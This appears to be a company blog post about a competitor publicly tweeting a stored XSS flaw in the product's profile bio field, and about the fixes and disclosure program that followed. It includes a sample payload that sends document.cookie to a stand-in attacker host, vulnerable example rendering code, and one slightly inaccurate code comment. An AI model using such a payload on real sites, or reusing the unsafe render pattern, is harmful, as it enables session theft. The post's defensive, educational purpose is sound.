TL;DR
A competitor discovered a stored XSS vulnerability in our product and tweeted about it before contacting us. The public disclosure was embarrassing and felt unfair, but it taught us important lessons about security, competition, and the value of having a vulnerability disclosure program.
The Tweet
I was having a normal Tuesday morning when my cofounder sent me a link to a tweet. It was from a developer at a competitor company.
"Just found a stored XSS vulnerability in @our handle's product. User input in profiles isn't sanitized. Anyone using this for sensitive data should be careful. You might want to look at this."
The tweet had a screenshot showing malicious JavaScript executing in our app. It already had 200+ retweets.
The Initial Reaction
My first emotion was anger. Why didn't they contact us privately? Why tweet it with screenshots? This felt like an attack disguised as helpfulness.
My second emotion was panic. If this was real (and the screenshot suggested it was), we had a serious vulnerability that was now public knowledge.
My third emotion, after calming down, was acceptance. Whatever the competitor's motives, the vulnerability existed. And that was our fault, not theirs.
Validating the Report
Within 10 minutes, we confirmed the vulnerability. The user profile "bio" field accepted HTML and JavaScript. When other users viewed a profile, the malicious code would execute in their browsers.
This was bad. An attacker could:
- Steal session tokens
- Redirect users to phishing pages
- Modify what users saw on the page
- Perform actions as the victim user
How we missed it: The bio field was added in a quick feature update. The developer assumed the frontend framework would handle sanitization. It didn't. There was no code review, no security testing. Classic "ship fast, fix later" thinking.
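To make the failure mode concrete, here is the bug class in miniature. This is an illustrative Python sketch, not our actual stack; the function name is invented for the example.

```python
# Illustrative only: a minimal version of the bug class, not our real code.
# The bio is interpolated into the page as-is, so browsers parse it as markup.

def render_profile_unsafe(bio: str) -> str:
    # Vulnerable: user-supplied text is trusted as HTML.
    return f"<div class='bio'>{bio}</div>"

# A token-stealing payload survives rendering intact and would execute
# in any viewer's browser.
payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
print(render_profile_unsafe(payload))
```

The frontend framework only protects you when you render through its escaping path; string interpolation like this bypasses it entirely.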
The Fix and Response
Technical Fix (30 minutes)
- Added input sanitization on the server side
- Added output encoding when rendering bios
- Sanitized all existing bio content in the database
- Added automated tests to prevent regression
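The core of the fix, sketched in Python; our stack differs, and `html.escape` here stands in for whatever encoding helper your framework provides. Encoding at render time turns markup into inert text.

```python
import html

def render_profile_safe(bio: str) -> str:
    # Output encoding: special characters become HTML entities, so the
    # browser displays the bio as text instead of parsing it as markup.
    return f"<div class='bio'>{html.escape(bio)}</div>"

payload = '<script>alert(1)</script>'
print(render_profile_safe(payload))
# <div class='bio'>&lt;script&gt;&lt;/script&gt; becomes visible text, not code
```

We also sanitized on write and re-encoded the existing rows, but output encoding is the layer you can never skip: stored data can arrive from paths you forgot to sanitize.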
Public Response
We replied to the tweet publicly:
"Thank you for reporting this. We've confirmed the vulnerability and deployed a fix within 30 minutes. We appreciate security reports and have set up security@our domain for future disclosures. We take this seriously and are reviewing our processes."
This response was carefully crafted. We thanked them (even though we were frustrated), confirmed we took it seriously, announced the fix, and showed we were learning from it.
The Aftermath
Customer Reaction
Some customers reached out concerned. We sent a proactive email to all users explaining what happened, what was at risk, and what we did to fix it. Most appreciated the transparency.
We lost two customers over it. We gained one who specifically said they liked how we handled the situation.
The Competitor
We never talked to them directly about it. Part of me wanted to call them out for the public disclosure. But the more I thought about it, the more I realized:
- They didn't create the vulnerability; we did
- We didn't have a clear way for people to report security issues
- Public disclosure, while uncomfortable, got us to fix it faster
The uncomfortable truth: If we'd had a security contact, a vulnerability disclosure program, or a bug bounty, they might have reported it privately. The public disclosure happened because we made it the only visible option.
What We Changed
Vulnerability Disclosure Program
We published a security.txt file (at /.well-known/security.txt, per RFC 9116) and a clear process for reporting vulnerabilities. We committed to responding within 24 hours and fixing critical issues within 72 hours.
Security Review Process
Any feature that handles user input now requires a security review. We created a checklist: sanitization, encoding, validation, access control.
Automated Security Scanning
We added automated security scanning to our CI/CD pipeline. It catches common vulnerabilities like XSS before they reach production.
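One way to wire this into a pipeline; this is a hypothetical GitLab-CI-style job with placeholder names and variables, using OWASP ZAP's baseline scan against a staging deploy.

```yaml
# Hypothetical CI job (job name and $STAGING_URL are placeholders):
# run OWASP ZAP's passive baseline scan and keep the report as an artifact.
security-scan:
  stage: test
  script:
    - zap-baseline.py -t "$STAGING_URL" -r zap-report.html
  artifacts:
    paths:
      - zap-report.html
```

The baseline scan is passive and fast enough to run on every merge; deeper active scans can run on a schedule instead.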
Regular Audits
Quarterly security reviews of our codebase, focusing on areas that handle user input, authentication, and data access.
Lessons on Competition and Security
This experience taught me that security vulnerabilities don't care about competitive dynamics. Your users are at risk regardless of who finds the flaw.
Yes, the competitor could have handled it better. But so could we. We could have:
- Not had the vulnerability in the first place
- Had a clear way for anyone to report security issues
- Been doing regular security testing ourselves
Blaming the messenger doesn't fix the message.
Should security researchers always disclose privately first?
Responsible disclosure norms suggest giving vendors time to fix issues before going public. However, if there's no clear way to report issues or vendors don't respond, public disclosure becomes more justifiable.
How do I set up a vulnerability disclosure program?
Start simple: create a security.txt file (securitytxt.org), add a security contact email, and publish a basic policy stating how you'll handle reports. You can expand to bug bounties later.
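A minimal security.txt looks like this; all values below are placeholders, and Contact and Expires are the two fields RFC 9116 requires.

```text
Contact: mailto:security@example.com
Expires: 2026-12-31T23:59:59Z
Preferred-Languages: en
Policy: https://example.com/security
```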
What's the difference between XSS types?
Stored XSS (like ours) persists malicious code in your database and executes whenever other users view it. Reflected XSS echoes attacker-controlled request data (URL parameters, form fields) back in the response. DOM-based XSS happens entirely in client-side code. All are serious.
How should I respond to public vulnerability disclosure?
Acknowledge quickly, thank the reporter (regardless of method), confirm you're investigating, announce when fixed. Don't be defensive or attack the reporter. Focus on protecting users.
Find Vulnerabilities First
Scan your app for XSS and other security issues before someone else does.
Start Free Scan